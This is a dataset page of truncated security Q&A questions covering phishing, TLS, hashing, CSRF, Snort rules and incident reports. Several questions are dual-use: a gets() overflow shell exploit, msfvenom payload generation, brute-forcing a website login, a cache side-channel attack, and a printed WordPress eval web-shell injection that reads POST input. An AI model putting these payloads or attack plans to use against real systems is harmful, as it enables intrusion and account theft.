instruction stringlengths 24 29.9k |
|---|
I am aware of other questions asking similar things as this one, but I believe this design addresses many of the issues raised in those questions. I'm also not concerned with making sure there's no database to store, only that the database doesn't store any secrets.
Using some key derivation function KDF
With master pa... |
We have fully configured SPF, DKIM and DMARC policies (100% reject) for our email domain (e.g. spoofed.com), which is managed by gmail, but we have recently started seeing spear phishing emails with the following format (our email addresses/names have been sanitised):
From: Bob Smith Bob@spoofed.com <admin@inter-corp.n... |
I am currently playing around with Mifare Classic 1k. And everything I have read about it's security is true. So it's not exactly the best thing to use to avoid cloning. But I was wondering if someone manages to hack one of these cards following online tutorial could we stop them from knowing what's on the card itself?... |
I'm trying to exploit the following code with a buffer overflow to get a shell:
int main()
{
char str[64]
gets(str);
return(0);
}
The platform is Ubuntu 64 bit, arch i686.
The program is segfaulting on the 76th byte. Next four bytes are the return address.
But when i implement a x86_64 execveat("/bin//sh... |
So, yesterday I needed to sign & scan some forms for my bank, a credit union. Nothing hugely confidential, except it has some account numbers on it. But still, I was a bit concerned, so the exchange, with my fairly senior advisor, whom I would not suspect to be IT savvy besides showing Powerpoints, went like this:
w... |
I was testing a site and came across a request with DELETE and I found X-CSRF: parameter was sent to ensure the doc can be deleted by a authorized person but when I removed the entire X-CSRF token and sent a empty parameter, it was accepted and the Doc got deleted.
Is there any possibilities for a exploit ?
Thanks in ... |
For the second time my website seems to be the target of a large automated attack. It seems complex enough and very well executed. I have the following systems in place:
Captcha on 3rd failed login from IP
Account lock for 30 min after 5 failed login attempts (using same email)
Minimum password requirements (8 chrs, l... |
On nodejs-express, I need a file upload function for my website's bulletin board so that every user can upload and download files for each other.
For security reasons,
I use npm module 'mmmagic' for validating if uploaded file's mime-type is not modulated (e.g. png) -or is in whitelist which I accepted.
And I'm conside... |
A few days ago I got an email to our dpo email address from a person I don't know who claims to be a Security Researcher. The email is well written and contains a POC with screenshots of a CORS Exploit (SOP Bypassed). My first reaction is "fishing for jobs". But when looking at the POC it seems he's just making an API ... |
The MASVS states in section "V6: Platform Interaction Requirements" MSTG-PLATFORM-11:
Verify that the app prevents usage of custom third-party keyboards whenever sensitive data is entered.
There are no references for test cases or similar and when I am thinking of Android it seems impossible, to force this behaviour.... |
In a Telegram public channel, all messages are public, send by the channel creators and contain a timestamp. Suppose I am an ISP. Can I analyse the traffic of all my clients and decide if they are sending a Telegram message? (assume they don't use Tor or VPN)
If so, I can look at the timestamp of all messages ever publ... |
I have multiple devices connected to a router, including my phone. The router has no internet; therefore, the network only works locally. All nodes can talk with each other thanks to the router. I use my phone to send messages to the nodes.
If no one has access to the WiFi password will it be possible for someone to sn... |
I have an odd case where a vulnerability scan is reporting that sshd is vulnerable because of TLS. I didn't think SSH used TLS, so can someone help me explain why "openssl s_client -connect hostname:22 -tls1" shows SSH is accepting TLS connections?
For example:
$ openssl s_client -connect myhost:22 -tls1
CONNECTED(000... |
I've tried googling but can't find a satisfactory answer. Probably looking up the wrong search terms...
I see questions on here and other forums that state they have a sophisticated attacker utilizing 50k, even 100k+ IP addresses to brute force logins, look for email matches, even DDOS.
I'm familiar with botnets, and I... |
the most bizarre thing happened, someone fount out the smtp mail driver credentials from a Laravel project, which are stored in the .env.
The credentials are used for a contact form. The .env was in production and the debug was set to false APP_DEBUG=false. The location of the .env was never changed so it is not a pub... |
When I install this plugin and activate in wordpress, hide_my_wp put some eval codes in wp_options and I see the following code being injected in a new row with the ID called 76624:
upload-dir=./../../,z=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));, #=eval("echo 10000000000-245205634;");, x=../../wp-config.php,... |
I am trying to make a rule to alert when downloading a .jpg file less than certain size. I used the parameter dsize:<500.
But it is not alerting when I tried to run a .pcap file containing a jpg less than 500MB.
Did I use the parameter correctly?
|
Recently my brother brought a usb from his friends to copy stuff from and ended up infecting my pc in the process.
I tried to solve the problem by installing kaspersky and doing a full scan of my computer on both normal mode and safe mode but no result, Kaspersky fails to detect and the virus and says the computer safe... |
This question may be silly but I've a hard time understanding TLS 1.2 and accessing a website via HTTPS.
I've received a report from a web security tool that my website is not HTTPS and I have to enable TLS 1.2 on the server. As per my understanding to make a website HTTPS I have to add a security certificate to the we... |
Having a program vulnerable to stack based buffer overflow with setuid bit set, and want to fill the buffer with ROP gadgets.
If setuid(0) is needed to spawn a shell with root privilege, then '0' would be written in the stack, so setuid() can take it as the unique argument. The 0 breaks the sequence we want to write in... |
Since data leaks are being more and more common, why companies like Microsoft and Google (but I'm not asking just about them) ask for a previous password if a user try to recover it?
Google's password recovery step:
Enter the last password that you remember using with this Google
Account
Why should we change our pass... |
Say I have a machine running Windows 10 with built in Device Encryption enabled. Say I want to reinstall Windows and sell the machine. I am wondering: after the format and reinstall, is a new key generated for the Device Encryption? Or in other words, without having access to the original recovery key, is it remotely p... |
Just wondering where I can track TLS 1.2, specifically, when will it be deprecated? A link would be appreciated - thanks!
|
I am doing the PortSwigger labs and came across this one: https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-arbitrary-object-injection-in-php
The first step of the solution is:
From the site map, notice that the website references the file /libs/CustomTemplate.php
How does Burpsuite ... |
What's the difference between this format:
Hash found: admin:$1$$oLN1UCc1Y3T30QkMcKMSx0
and the following:
5f4dcc3b5aa765d61d8327deb882cf99
And also,
How to turn the first hash format into the second one?
Thanks in advance.
|
I am learning Ethical Hacking.
I create my own website on a cloud hosting service for testing purposes.
I run DoS attack from my local VM and it shows that website is down.
When I sent a link to my friend he told me that the website runs normally. When I change network and connect to another WiFi it really shows that w... |
When I try to find websites hosted on a specific IP using one of the online Reverse IP Lookup tools, I only get one website, but when I use Sub-domain enumeration, I find several websites on the same IP
Why does this happen? And how can I find all the websites on a particular IP?
|
If I'm not mistaken, in webapps there are a lot of potential attack vectors, such as http header spoofing and what not, which are not there in typical rich-client desktop applications, such as WPF applications. To add a bit more motivation to my question, I have the feeling that most security related issues I come acro... |
For example, if someone uploads a malicious image on website like Instagram or Facebook, and then hundreds of people viewed this image, wouldn't that be an easy way to infect the devices of hundreds or thousands of people? If so, why do people view tens or hundreds of images without being afraid of getting their device... |
Can someone guide me how to write PCRE option to match list of websites such as for eg facebook.com, google.com,ebay.com? I tried to understand from manual but couldn't get is right?
regards,
|
When a user fails to successfully login, what information should be given back to them?
Normally, we post back "Account not found" or "Incorrect password" or "Incorrect Location" (for location restrictions). But some articles suggest it should be akin to "Login Failed. Please try again." without elucidating why it fai... |
Every time I go check my account's activity I see something very weird and worrying: multiple attempts to log in to my account, anywhere from 1 to 3 daily attempts. This has been going on for years.
The list goes on and on, this is only the first page.
All attempts are being done through IMAP protocol, and a proxy ch... |
I have a table for single use tokens, and one of the columns is a token_digest which contains a bcrypt hash of the access token. Since the token_digest is a salted and hashed version of the plaintext token, I can't just run a select against the computed hash.
When my application gets the plaintext token from a client, ... |
While reading this question, it got me to thinking.
Let's say an attacker has some way to make all of their login attempts appear legitimate - enough IP addresses to never reuse them, different valid browser UA strings on each request matching the spread of browsers usually seen, what have you.
Would a strong hashing f... |
I am new to Kali Linux and JTR but am playing around trying to crack a PDF file. I set the PDF Password to test so it's a known password on my own file. For whatever reason JTR appears to finish cracking the file but returns (?)
What am I doing wrong, is JTR only able to crack document view passwords not document edit ... |
I noticed on my router one or two hours ago that there were two new devices connected to it that I did not recognize. In a normal situation I would think that my WiFi password was just compromised, but I noticed that one of the connections was, according to my router, wired i.e. connected to my Ethernet.
The wired devi... |
I'm working in IOT team to build a web based IOT system.
I'm using Dataplicity's Wormhole to host my nodeJS app on raspberry pi. I want to use DHE-RSA symmetric key encryption channel for sending/receiving data from client to server and vice-versa.
In case of DHE-RSA server generate DH parameter and then sign them with... |
A common scam involves fake technical support tricking the victim into calling them, downloading remote access software, and allowing the scammer access to their computer.
Suppose the victim recognises the attack part way through and shuts down their computer. What should they do next?
Here's what I guess should be don... |
Please concern the following setup: A client certificate is issued like this:
Root CA → Intermediate CA → Client Cert
Let's assume everything is fine up to here, the intermediate CA cert is properly signed by the root CA and the same for the client cert and the intermediate CA. The following files were produced:
root_... |
I'm new to gbd. I've wrote a simple program which will print hello world 10 times(I've listed the program in the screenshot). Then I've displayed the assembly language and set the break point to main and after running the program untill main, I've displayed the content of the rip register.
Now the confusion is, in th... |
Recently I registered iCloud account with my gmail account. Now I received fake email from "iCloud" on mail.com email address which I use frequently for registering accounts on various sites. This email address is also recovery address for the gmail account.
Here's the fake email:
Also, something similar happened when... |
My company is currently evaluating a product which comes with a browser-extension-based password manager. The password manager is peripheral to their core product, but is the only way to use it. We're trying to assess their security — we're not going to be storing super-confidential entries, but we do want to make sure... |
The ASUS motherboard in an older PC I own failed. I purchased a replacement from a vendor on eBay, shipped from China (Shenzhen). Only after receiving the motherboard did it occur to me to wonder about the security of the motherboard, and in particular the BIOS installed.
Am I being unnecessarily paranoid?
My main conc... |
Problem
I am putting together a proof of concept for the FLUSH + RELOAD attack. The method is outlined in great detail in this paper. The general idea is simple - cached addresses can be accessed with much greater speed than addresses not in the cache. By clearing the cache, running a victim process that accesses certa... |
How do you generate a batch file for windows .bat using msfvenom, msfvenom does not seem to have a batch file like format and is it possible to convert a .ps1 to .bat file
|
I was looking into this code base (https://github.com/vstoykovbg/doubleslow) and the following phrase caught my attention:
DANGER of catastrophic data loss! One bit flip (due to cosmic rays for example) can make the result of the hash functions completely different. Run the scripts several times to confirm that they p... |
I received an "Undelivered Mail Returned to Sender" email, which is quite suspicious.
The message is displayed in Thunderbird like this:
From: someRandomStuff my.name@mail.provider
Date: 24.08.20, 21:05
To: a list of very random looking email addresses, probably machine generated
Is this simply a case of using some... |
I use these commands to create a self-signed certificate, subject's key and CSR, and subject's signed certificate:
Root CA:
openssl req -new -sha256 -x509 -days 7300 -out ca.crt -keyout ca.key.pem -nodes
Server CSR:
openssl req -new -sha256 -out server.csr -keyout server.key.pem -nodes
Sign with CA:
openssl ca -cert... |
I'm creating this admin dashboard, and I have a question wich I have been stuck on for a while now.
And I'm starting to question what kind of data the admin should be able edit/view on the other registered users.
Should the admin users be able to:
Change the users password?
Send password-reset email to the user?
Chang... |
I have developed my DRF back-end API locally, deployed it on an AWS Lightsail instance (with a public static IP) and I now want to secure it with HTTPS.
I understand that in order to use Let's Encrypt (and not pay for an SSL certificate), I have to have a domain name associated to my instance IP since Let's Encrypt doe... |
I want to understand the risk in reusing complex password.
Unique complex passwords for each and every email account, say 3.
All other accounts, bank, medical, social, share a complex password, 1
This makes a total of 4 passwords.
LinkedIn account gets hacked, emails and passwords are lifted.
How does this affect sec... |
So, here is the deal:
I have a file I cannot change. I cannot, but I know in the future I will want to change it. It's of my understanding that it's not possible to make this file unchangeable while being root. But I want to make it so that the only way to change it is by building my whole OS from ground up.
So, here ... |
Is Web Cache Deception vulnerability exploitable if there is no cache server involved?
If we are not using a cache servers or a CDN to serve the application, then would the application still be vulnerable - say if the client's network using the application has a caching server to serve its users?
Background: Our webapp... |
I am supposed to do a test for AWS. But since AWS has limitations, probably also in the direction of DDoS and other points, what does a corresponding test scenario look like?
It is about a Magento instance that is integrated on AWS.
Do you already have some knowledge on how I could proceed best?
Is there a test profile... |
I was trying to test and intercept traffic from an app developed on Rhodes open source framework, I setup a proxy with burp, and of course I have installed burp certificate on my device hence I can intercept other apps on my device but I am unable to see the traffic of the app in question - its link on burp suite inste... |
I ran a Qualys scan on my website and got a Slow HTTP POST vulnerability. In particular, server resets timeout after accepting request data from peer.
From what I understood from this finding, whenever a similar client restarts its connection to the server, the timer is reset. I have so far configured the connectionTim... |
I am using CVSS to do the vulnerability assessment for my project.
As per documentation here is the definition of local and adjacent
Adjacent (A) The vulnerable component is bound to the network stack, but the attack is limited at the protocol level to a logically adjacent topology. This can mean an attack must be l... |
The format is 1 letter + 5 numbers (e.g. A12345).
Any method and software?
|
I know about images posing a risk to security. I don't open suspicious junk emails for this reason. However, occasionally I have to check my junk email folder without clicking on an email just in case anything mistakenly went in there. I am seeing a growing number of junk emails have images in the FROM name before open... |
According to this Kaspersky blog post, it is a security risk to connect IoT devices, such as Smart TVs, to my home WiFi. It claims I should use my guest WiFi network for this.
Is this true? Is it a security risk to use my regular network to get internet to my TV?
|
I just scanned another installer/EXE with VirusTotal. I've come to depend on this crappy service owned by the evil Google, in spite of its ambiguous messages and extremely confusing interface, because I don't have any other choice.
But I never feel confident about the result, especially not when some engines DO detect ... |
So there are a few cloud storage services such as mega.nz, syn.com and others which state that they use zero knowledge encryption. This would mean that they don't have access to the private keys which are required to decrypt and view the content stored by a user on their cloud storage.
If that is the case, then how is ... |
I downloaded Bitcoin Core from here: https://bitcoin.org/bin/bitcoin-core-0.20.0/bitcoin-0.20.0-win64-setup.exe
I then uploaded it to VirusTotal: https://www.virustotal.com/gui/file/0f1ea61a9aa9aba383a43bcdb5755b072cfff016b9c6bb0afa772a8685bcf7b0/detection
On that page, it confusingly says:
0f1ea61a9aa9aba383a43bcdb57... |
How to use a USB hard disk to transfer files from Ubuntu to Windows 10 PC in a secure manner? I have not used that disk for a while but it was probably exposed to a few PCs that do not belong to me. What would be a secure way to use it? Ideally, I would like to preserve files on it.I would prefer some antivirus or such... |
I have a friend who is being threatened by anonymous accounts threatening blackmail. I have gotten multiple ip addresses from an iPhone, all 1 number off, from this person but they were stupid enough to tell me the vpn they use (widscribe).
|
Here (https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) it is mentioned
The port number is checked separately by the browser. Any call to document.domain, including document.domain = document.domain, causes the port number to be overwritten with null. Therefore, one cannot make company.com:8080... |
We have a website and for which we have backend APIs.
Now the issue is majority of our APIs are opened for non-logged in user(Functional Requirement).
Now what we want is to secure those APIs in terms that no one you should start crawling and get all the data.
One obvious way is definitely bot detector. What are the ot... |
I already know the password format: 1 Upper Case Letters + 5 digits + bf (bf is the known letters, they must included in the password and at the end)
For example: A12345bf, C12301bf, D10282bf.
I want to hack a website by using Hatch. (brute force)
But it’s too slow, it probably gonna take 1 million years.
So I want to ... |
I have a reverse proxy, configured as the Relying Party of an OpenID Connect identity provider. Then, it delegates the request processing to another web server, exposed on the internet. In order to secure and authenticate this data flow, I thought I could use the RS256 algorithm to sign the ID token and pass it along t... |
I am looking for a way to protect a system utilizing SHA256 on semi-weak passwords against brute force attacks using ASIC-levels of hash-power, ideally by designing a system that is ASIC resistant.
The following scenario is theoretical in nature, and is concluded as a question on how ASICs work at a hardware level.
Sup... |
I'm trying to understand the point of having multiple Certificate Transparency logs. While I understand that it solves the problems of reliability of trust, what baffles me is that so many are operated by the same entity: most notably, Google operates the following:
Google 'Argon2020' log
\- Cert Count: 8720985... |
SCENARIO:
a vulnerable login form. I say vulnerable because if I enter +select(sleep(0))+ the server response normally. If I enter +select(sleep(5))+ the server wait for a period of time greater than 5" and then responds with "connection failed". Can be this considered a proof of SQL injection?
Could I leverage this d... |
Is there a way to configure burpsuite's upstream proxy direct the traffic to the local box's proxy configuration? Additionally is there a way to exclude urls from being directed to the upstream proxy.
|
I'm somewhat new to the field, but I have been tasked with coming up with the best way to connect remote customer sites to our two main offices. The data sent across from the customer to the main offices contains sensitive information and needs to be protected adequately.
From what I've gathered, VPN connections would ... |
A website has some bruteforce prevention for logins, and I need to turn that off because it's buggy and it's causing problems. It will stay turned off, probably forever, because there are no plans to do any maintenance on that website. It's a small company's website, there are only a few users (maybe about 10), and mos... |
Not sure if this kind of review/validation question is allowed - please delete if it isn't.
Like many before, I'm looking for ways to do cloud backup in a way where I trust that I'm still the only one with access to the information.
Context / goals / hypothesis:
data is natively stored on a Linux computer
information ... |
My friend has stolen my IMEi number. Through this can he get my any personal data like whats app message, Calls records, old history of Facebook login details??
|
Can an old and upatched (assume a 15 y.o. TP-Link: so plenty of vulnerabilities) be breached given:
no physical access
WEP is disabled
WPA is up but password is not crackable via aircrack-ng + johntheripper
|
I want to fuzz the restricted shell which is customized linux shell. I can only run certain commands which are specific to application. OS commands are not allowed to run. The shell looks as below after doing ssh to it,
My goal is to fuzz the input parameters for this shell and observe the crashes and unexpected error... |
I'm currently implementing a REST Api for a Single Page Application and Mobile App. Any 3rd party login or grant access to them is not required.
I've microservices behind a gateway (all HTTPS).
My current design is as follows:
POST username/password to /session. This generates two tokens, SessionToken (7 days exp), Acc... |
We have an automated system to disable user accounts that have seen no logins for 90 days. We also have a process of re-enabling such accounts (at the behest of the affected users), and this process involves contacting our customer support.
Alas, too frequently such re-enabled accounts are not actually logged into duri... |
Is there a way to list all keys inside the Utimaco HSM, created by PKCS11 interface and cngtool?
currently, I only can view each of them separately:
PKCS11: using "PKCS#11 CryptoServer Administration" interface.
CNG keys using the command: cngtool ListKeys
|
I manage an Ubuntu server that runs a number of WordPress sites. This morning one of them went down and was showing the exception
PHP Fatal error: Namespace declaration statement has to be the very first statement or after any declare call in the script in /var/www/vhosts/new.wearesno.com/httpdocs/wp-content/plugins/w... |
Say I build a mobile app. For the sake of the example, the app is an Android App and let's call it the Client
And this mobile app communicates with a server application. For the sake of this example, the server is a NodeJs Express server and let's call it the Server.
Is there a way we can tell for sure that an Http Req... |
I recall that there is a list of hosting domains that are known to have subdomains from different sources, as for example wix.com and appspot.com, built into browsers. For such domains, subdomains do not inherit trust from the domain.
I forget the name of the list. What is it called?
|
Suppose that I have my mobile connect with a VPN and I use my mobile as a WiFi router to provide internet to a laptop.
If I check my ip from the mobile, it is correctly the ip of VPN while if I check it from the laptop it is the one of my mobile ISP.
Why?
I thought the connection would be channelled through the VPN als... |
I have a list of files taken from a dead system, but not the actual files themselves, or any other information (e.g. properties) that would indicate the OS version. Is there a way to determine the version of the OS based on the presence of particular files?
For example, if a particular file introduced in Windows XP SP2... |
When implementing an authorization system like RBAC/DAC, or XACML, or the AWS IAM authorization model, I see that I can't totally decouple business logic from authorization when there are fine-grained business restrictions.
We don't use ORM. When composing the query to match the role restriction, we can't make simple q... |
So we use DUO for 2FA at work and it uses push notification authentication as the second factor for 2FA. It's so quick and easy! I enter my username and password, get a push notification on my phone, tap Approve, and that's it! No fiddling with codes from an authenticator app or SMS, and definitely much more secure tha... |
According to this Reddit comment, an advertisement on one page seems to be able to log a user's keystrokes on a different page (if I understand the comment correctly).
Is this really true?
Can an advertisement even log keystrokes on its parent page?
|
I'm getting started learning pentesting and I came across this situation.
Privilege Escalation
Running WinPeas I noticed a change to escalation bypass UAC. I was thinking to use a local exploit (Kali) with Chisel forwarding this traffic for HackBox Machine. Is it possible?
+-------------+ ... |
I'm thinking of installing Veracrypt and I read that it takes Veracrypt about 5 minutes to decrypt a 500 gig SSD. How is this possible? It takes me much longer to duplicate the same 500 gigs on my SSD!
Can someone explain how this is possible?
This is how I analyze the situation. The following are the fundamental ta... |
We have a site builder, allows users to add/modify JS/HTML/CSS. Is it possible to provide a global authentication for it?
I mean users login once but can interact with all sites as their own names. Those sites should not be able to steal user token and change data in other sites in the network. Consider a global authen... |
I'm looking for research on the topic if at all possible or readings about efforts into this.
Drilling down into binaries via fuzzing/fingerprinting for known vulnerable binary patterns and a little boilerplate shellcode to insert into binary when found seems doable.
I envision it working in layered steps.
Look for fin... |
I'm working in a desktop application using Electron.js with React.js and I have to store some sensitive information like API keys and database credentials. So I started digging and decided to encrypt the database credentials in a JSON file with an obfuscation method on top of it.
Now I have two SECRET_KEYS, one for the... |
On Kali Linux, I have an Atheros wireless adapater. I'm trying to capture data packets off the air and decrypt them as an exercise. The problem is that when I turn on the wifi monitor mode and choose an appropriate channel, Wireshark can catch 802.11 management packets such as beacon, probe_request, but it can't catch ... |
I am doing online school at the moment and I am wondering if my school tracks and looks at everything I search just through my school Gmail account. I am on my own network and pc which has never been connected to the school network in any way except through the school Gmail account.
|
I'm learning about networking. And I feel a donkey.
Background
We connect to the internet by first connecting to a Wifi Access Point, or a switch.
Then when we open up a browser, or use any transfer protocol to ask for a file, and information is sent across a huge network.
If I get this correctly, when using a VPN the ... |
Suppose you are administering a mailing list where only members/subscribers can post; but you want those members to be able to occasionally post some content to the list anonymously. (*)
Now, in an any-one-can-post list, you don't really have to do much: A subscriber can set up a dummy email address and post from there... |
Is the most secure way of viewing an infected pdf file through a cloud pdf reader like xodo using a pdf uploaded to Google Drive?
I have a work laptop and I currently work for a small startup that had their database wiped out by a ransomware, so every usb drives are disabled and cannot be used to upload files to my lap... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.